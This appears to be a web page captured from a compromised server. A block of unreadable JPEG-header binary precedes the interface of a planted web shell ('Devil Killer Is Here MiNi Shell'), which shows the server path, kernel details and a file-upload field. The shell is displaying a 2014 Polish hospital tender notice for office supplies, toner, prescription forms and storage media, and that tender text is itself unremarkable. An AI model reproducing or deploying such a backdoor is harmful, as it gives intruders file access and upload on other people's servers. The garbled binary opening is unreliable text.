JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140502/94945-N-2014.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o. dostaw materiałów biurowych</b><br>
<b>Numer ogłoszenia: 94945 - 2014; data zamieszczenia: 02.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Siemianowicach Śląskich Spółka z o.o. , ul. 1-go Maja 9, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 32 2281930, faks 32 2281498.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsiemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich Sp. z o.o. dostaw materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawa materiałów biurowych wg załącznika nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.12.51.00-2, 33.12.51.10-5, 30.12.51.20-8, 30.19.20.00-1, 30.19.70.00-6, 30.23.43.00-1, 30.23.44.00-2, 30.23.70.00-9, 30.19.76.42-8, 30.19.93.30-2, 30.19.76.44-2, 30.19.76.20-8, 30.19.97.20-3, 30.19.94.10-7, 30.19.76.30-1, 30.19.72.20-4, 30.19.92.30-1, 30.19.92.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony jeżeli Wykonawca wykaże, że  zrealizował co najmniej dwie dostawy o łącznej wartości min.  5 000,00 zł brutto, których przedmiotem były dostawy materiałów biurowych. Na potwierdzenie spełnienia warunku Wykonawca dołączy wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane oraz załączeniem poświadczenia, że te dostawy zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 6 do SIWZ. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa, składa stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-prawidłowo wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;
-zaakceptowane i podpisane warunki projektu umowy - załącznik nr 4 do SIWZ;
-oświadczenie o zapoznaniu się z warunkami postępowania  - załącznik nr 5 do SIWZ;
-wypełniony formularz cenowy - załącznik nr 7 do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Dostawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą: 
-zmiany ilości zamawianego asortymentu przy zachowaniu cen jednostkowych zgodnych z ofertą Dostawcy,
-obniżenia cen w stosunku do cen ofertowych przez Dostawcę, w tym w wyniku zastosowania przepisów ustawy o refundacji leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych,
-zmiany numeru katalogowego produktu lub jego nazwy przy zachowaniu tożsamości dostarczanego produktu i jego cech jakościowych nie gorszych niż produkt zaoferowany w ofercie.
-zmiany danych Stron umowy (np. zmiana siedziby, adresu, nazwy),
-działania siły wyższej lub wystąpienia stanu wyższej konieczności,
-zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe, zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
-omyłek pisarskich lub błędów rachunkowych,
-mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego.
-zastąpienie produktu objętego umową odpowiednikiem w przypadku zaprzestania wytwarzania produktu
-sposobu konfekcjonowania produktów przy zachowaniu cen jednostkowych przeliczonych odpowiednio dla nowego sposobu konfekcjonowania, zmiany numerów katalogowych produktów w przypadku aktualizacji katalogów przez producenta, a także w zakresie zmiany produktu przy zachowaniu nazwy międzynarodowej jeżeli produkt objęty ofertą został wstrzymany w produkcji lub wycofany, przy zachowaniu ceny jednostkowej
2.Zmiana postanowień umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.  Zmiana nie może dotyczyć istotnych postanowień umowy w stosunku do treści złożonej oferty.
3.Dopuszcza się używanie w fakturach określenia dostarczanego towaru zgodnego z systemem komputerowym Dostawcy, o ile pozwala on na ustalenie zgodności dostarczonego asortymentu z zamówieniem i tożsamości produktów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsiemianowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Siemianowicach Śląskich Sp. z o.o.
41-100 Siemianowice Śląskie, 
ul. 1-go Maja 9, 
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2014 godzina 09:30, miejsce: Szpital Miejski w Siemianowicach Śląskich Sp. z o.o.
41-100 Siemianowice Śląskie, 
ul. 1-go Maja 9, 
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cienkopisy kolorowe
2.Długopis zwykły
3.Dziurkacz na co najmniej 10 kartek
4.Etui na dyplomy
5.Folia do bindowania
6.Folia do laminowania A 4 ( minimum 2x100 mic)
7.Folia do laminowania A 5 (minimum 2x100 mic)
8.Folia do laminowania A 7 (minimum 2x100 mic)
9.Grzbiet plastikowy do bindowania
10.Gumka ołówkowa
11.Identyfikator plastikowy na agrafkę
12.Kalka
13.Klej biurowy w sztyfcie
14.Klej biurowy w tubce
15.Korektor w płynie z pędzelkiem
16.Korektor w taśmie typu Pelikan
17.Koszulka z folii A4 (grubość folii minimum 55 mikronów)
18.Koszulka z folii A4 na katalogi
19.Koszulka z folii A5 (grubość folii minimum 55 mikronów)
20.Linijka od 25 do 40 cm
21.Małe magnesy do tablicy wielkość (1 grosza)
22.Marker biały (RTG)
23.Marker do tablicy (ścieralny)
24.Marker kolorowe wodoodporny
25.Marker permanentny do opisywania płyt CD-DVD biały końcówką okrągłą 1 mm
26.Marker permanentny do opisywania płyt CD-DVD czarny końcówką okrągłą 1 mm
27.Mazak (czarny, zielony, niebieski, czerwony)
28.Nożyczki biurowe
29.Obwoluta (twarda) - koperta z folii
30.Ołówek automat
31.Ołówek zwykły
32.Pineski
33.Pojemnik tekturowy na czasopisma A4
34.Pudło archiwizacyjne szer. 10 cm
35.Pudło archiwizacyjne szer. 15 cm
36.Pudło archiwizacyjne szer. 20 cm
37.Pudło archiwizacyjne szer. 25 cm
38.Segregator A4 7 cm kolorowe 
39.Segregator A5 5 cm kolorowe
40.Skoroszyt plastikowy oczko
41.Spinacz biurowy duży
42.Spinacz biurowy mały
43.Sticksy 2 x 5 cm
44.Sticksy 4 x 5 cm
45.Sticksy 5 x 5 cm
46.Sticksy 7,5 x 7,5cm
47.Szufladka na dokumenty wysokość grzbietu 6 cm
48.	Taśma klejąca bezbarwna szer. od 1,8 cm do 2,5 cm
49.	Taśma klejąca dwustronna
50.	Taśma pakowa bezbarwna
51.	Teczka do podpisu 15 kartek
52.	Teczka do podpisu 20 kartek
53.	Teczka kopertowa ma zatrzask A4
54.	Tusz do stempli automatycznych czarny
55.	Tył kartonowy do bindowania
56.	Zakreślacz
57.	Zszywacz na co najmniej 20 kartek
58.	Zszywki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.72.20-4, 30.19.94.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> artykuły papiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Koperta biała B4 z klejem
2	Koperta biała B5 z klejem
3	Koperta listowa C6
4	Koperta papierowa na CD/DVD-R z okienkiem foliowym przeźroczystym
5	Koperta RTG 20 x 25
6	Koperta RTG 25 x 32
7	Koperta RTG 37 x 37
8	Koperta RTG 45 x 37
9	Koperta szara B4 z klejem
10	Koperta szara B5 z klejem
11	Papier do drukarek 240 x 2
12	Papier fax 210 mm - 30 m
13	Papier kolorowy A4
14	Papier ksero A3 - typu POLUX
15	Papier ksero A4 - typu POLUX
16	Papier ozdobny
17	Taśma do metkownicy - 1 rzędowe białe
18	Taśma do metkownicy - 3 rzędowe białe
19	Teczka do wiązania A3
20	Teczka do wiązania A4
21	Teczka do zawieszania 
22	Teczka z gumką
23	Zeszyt A4 60 kartek (szyty) w miękkiej okładce
24	Zeszyt A4 60 kartek (szyty) w twardej okładce
25	Zeszyt A5 60 kartek (szyty) w miękkiej okładce
26	Zeszyt A5 60 kartek (szyty) w twardej okładce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.42-8, 30.19.93.30-2, 30.19.76.44-2, 30.19.76.20-8, 30.19.97.20-3, 30.19.76.30-1, 30.19.92.30-1, 30.19.92.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materiały eksploatacyjne do komputerów i kserokopiarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bęben do Drukarki Canon iR 3225 typ C-EX V11	wydajność 75000 kopii A4 przy pokryciu 5% strony
2	Bęben do Drukarki OKI B430DN typ OKI 43979002	wydajność 25000 kopii
3	Bęben do Ksero Canon ir1600 typ Canon CF6837A003AA	wydajność 21000 kopii
4	Bęben do Ksero Canon ir2200 typ CEXV3DRUM	wydajność 55000 kopii
5	Bęben do Ksero Canon ir2270 typ Canon IR2270-4570	wydajność 75000 kopii
6	Bęben do Ksero Minolta CF9001 typ Konica Minolta 1179-0297-01	-------------
7	Fuser Oil do Ksero Minolta CF9001 typ Konica Minolta 9966-242	----------
8	Taśma do drukarek OKI ML 3320/3321  
(kod producenta OKI 09002303)	wydajność 3 miliony znaków
9	Taśma do drukarek OKI ML 3390 
(kod producenta OKI 09002309)	wydajność 2 miliony znaków
10	Taśma do drukarek OKI ML 3410 
(kod producenta OKI 09002308)	-----------
11	Taśma do drukarki Panasonic KX-P2130 
(kod producenta Panasonic KX-P160)	wydajność 3 miliony znaków
12	Taśma do metkownicy - 3 rzędowe białe	-----------
13	Taśma Optima SP 20	-----------
14	Toner do drukarek HP CLJ CM2320fxi typ HP CC530A	wydajność 3500 standardowych stron zgodnie z normą ISO/IEC 19752
15	Toner do drukarek HP CLJ CM2320fxi typ HP CC531A	wydajność 2800 standardowych stron zgodnie z normą ISO/IEC 19752
16	Toner do drukarek HP CLJ CM2320fxi typ HP CC532A	wydajność 2800 standardowych stron zgodnie z normą ISO/IEC 19752
17	Toner do drukarek HP CLJ CM2320fxi typ HP CC533A	wydajność 2800 standardowych stron zgodnie z normą ISO/IEC 19752
18	Toner do drukarek HP LJ 1010,1018,1020 typ 12A (Q2612A)	wydajność 2000 standardowych stron zgodnie z normą ISO/IEC 19752
19	Toner do drukarek HP LJ 1100 typ 92A (C4092A)	wydajność 2500 standardowych stron zgodnie z normą ISO/IEC 19752
20	Toner do drukarek HP LJ 1200 typ 15A (C7115A)	wydajność 2500 standardowych stron zgodnie z normą ISO/IEC 19752
21	Toner do drukarek HP LJ M1522nf typ HP CB436A 	wydajność 2000 standardowych stron zgodnie z normą ISO/IEC 19752
22	Toner do drukarek HP LJ P1005 typ 35A (CB435A)	wydajność 1500 standardowych stron zgodnie z normą ISO/IEC 19752
23	Toner do drukarek HP LJ P2055DN typ HP CE505X 	wydajność 6500 standardowych stron zgodnie z normą ISO/IEC 19752
24	Toner do drukarek OKI B430DN typ OKI 43979202	wydajność 7000 standardowych stron zgodnie z normą ISO/IEC 19752
25	Toner do drukarki HP LJ 4250DN typ HP Q5942A	wydajność 10000 standardowych stron zgodnie z normą ISO/IEC 19752
26	Toner do drukarki HP LJ 8000DN typ HP C3909A	wydajność 15000 standardowych stron zgodnie z normą ISO/IEC 19752
27	Toner do Ksero Canon iR 3225N typ C-EXV12	wydajność 24000 kopii standardowych stron zgodnie z normą ISO/IEC 19752
28	Toner do Ksero Canon ir1600 typ C-EXV5 (CF6836A002AA)	wydajność 7800 standardowych stron zgodnie z normą ISO/IEC 19752
29	Toner do Ksero Canon ir2200 typ C-EXV3	wydajność 15000 kopii przy 5% pokryciu
30	Toner do Ksero Canon ir2270 typ C-EXV11 (CF9629A002AA)	wydajność 21000 standardowych stron zgodnie z normą ISO/IEC 19752
31	Toner do Ksero Canon MF 457ODN typ kaseta All in One 728	wydajność 2100 kopii standardowych stron zgodnie z normą ISO/IEC 19752
32	Toner do Ksero Konica Minolta BizHub 160 typ TN-113	wydajność 5000 standardowych stron zgodnie z normą ISO/IEC 19752
33	Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-123	wydajność 10000 kopii A4 przy pokryciu 5% strony
34	Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-124	wydajność 10000 kopii A4 przy pokryciu 5% strony
35	Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-125	wydajność 10000 kopii A4 przy pokryciu 5% strony
36	Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-126	wydajność 10000 kopii A4 przy pokryciu 5% strony
37	Tusz do drukarek HP typ HP54 (CB334AE)	pojemność min. 20 ml
38	Tusz do drukarek HP typ HP57 (C6657AE)	pojemność min. 17 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Recepty RUM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Recepta RUM biała składanka (1+1) do stosowania w drukarkach igłowych	Papier składanka do wydruków recept w drukarkach igłowych z perforacją umożliwiającą rozrywanie poszczególnych kuponów. 1 opakowanie zawiera 1 000 składanek tj. 2 000 kuponów.
2	Recepta RUM biała do stosowania w drukarkach laserowych	Papier A4 do wydruków recept w drukarkach laserowych i atramentowych, bez nadruku z perforacją umożliwiającą rozrywanie poszczególnych kuponów. 1 opakowanie zawiera 1 000 kartek tj. 2 000 kuponów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.70.00-6, 30.19.93.30-2, 30.19.76.42-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nośniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	DYSKIETKI
VERBATIM kod 87410 lub równoważne, co do trwałości, jakości i parametrów	Pojemność: 1,44 MB
Rodzaj opakowania kartonowe pudełko wraz z 10 etykietami do naklejania na dyskietki 
Ilość w opakowaniu: 10 szt. sformatowane
2	Płyty BLU-RAY
VERBATIM kod 43751 lub równoważne, co do trwałości, jakości i parametrów	Standard: BD-R
Pojemność: 25GB
Maksymalna wymagana prędkość zapisu: 6x
Rodzaj opakowania: cake
Ilość w opakowaniu: 10 szt.
Rodzaj zapisu: jednostronny
Gwarancja: 2 lata
Inne cechy: przystosowane do nadruku 
3	Płyty CD - R 
VERBATIM kod 43432 lub równoważne, co do trwałości, jakości i parametrów	Standard: CD-R
Długość/Pojemność: 80 min/700 MB
Maksymalna wymagana prędkość zapisu: 52x
Rodzaj opakowania: cake
Ilość w opakowaniu: 25 szt.
